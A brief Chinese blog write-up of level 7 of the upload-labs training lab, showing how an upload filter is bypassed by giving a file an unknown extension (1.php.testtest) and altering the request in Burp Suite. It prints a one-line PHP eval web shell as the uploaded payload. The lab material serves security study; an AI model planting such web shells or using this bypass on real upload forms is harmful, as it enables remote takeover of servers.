upload-labs靶场未知后缀名解析漏洞

煜磊2023-09-26 12:13

upload-labs靶场未知后缀名解析漏洞

版本影响:

phpstudy 版本:5.2.17

1 环境搭建

1.1 在线靶场下载,解压到phpstudy的www目录下,即可使用
复制代码 
https://github.com/c0ny1/upload-labs
1.2 已启动:访问端口9000,端口自设,打开页面选择第七关
复制代码 
http://192.168.225.194:9000/upload_labs/

2 漏洞复现

2.1 上传1.php文件,文件内容如下,显示上传错误,使用bp上传
复制代码 
<?php @eval($_REQUEST[777]);phpinfo();?>
2.2 使用bp转发

修改php后缀和文件内容类型,进行转发,返回信息提示上传成功

访问不能执行

结论php可以上传,php的不能上传,做了黑白名单策略,验证使用白名单或者是黑名单,随便给个后缀testtest

上传1.php.testtest成功

相关推荐
视觉&物联智能8 小时前
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
网络·人工智能·web安全·网络安全·安全威胁分析
博睿谷IT99_8 小时前
网络安全怎么入门?快速了解
安全·web安全
学习溢出9 小时前
【网络安全】网络钓鱼的类型
网络·安全·网络安全·网络钓鱼·社会工程
落——枫11 小时前
网络安全知识点3
安全·web安全
Web极客码12 小时前
如何在WordPress网站中设置双重验证,提升安全性
php
柴郡猫^O^12 小时前
OSCP - Proving Grounds - Wpwn
安全·网络安全·安全性测试
安全系统学习12 小时前
网络安全之红队LLM的大模型自动化越狱
运维·人工智能·安全·web安全·机器学习·php
Suckerbin13 小时前
第十一章-PHP表单传值
开发语言·php
FreeBuf_14 小时前
新型“电力寄生虫“网络钓鱼攻击瞄准能源企业与知名品牌
网络·php·能源
马大胡子15 小时前
Greenbone(绿骨)开源GVM容器docker部署和汉化介绍
linux·网络安全·docker
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03西电B测-计算机网络综合实验(含验收问题)04YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】05Coze扣子平台完整体验和实践(附国内和国际版对比)06DeepSeek各版本说明与优缺点分析07Python基于Flask的豆瓣电影数据分析可视化系统(附源码,文档说明)08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09我决定放弃搞 Java 了10最新 Kubernetes 集群部署 + flannel 网络插件(保姆级教程,最新 K8S 版本)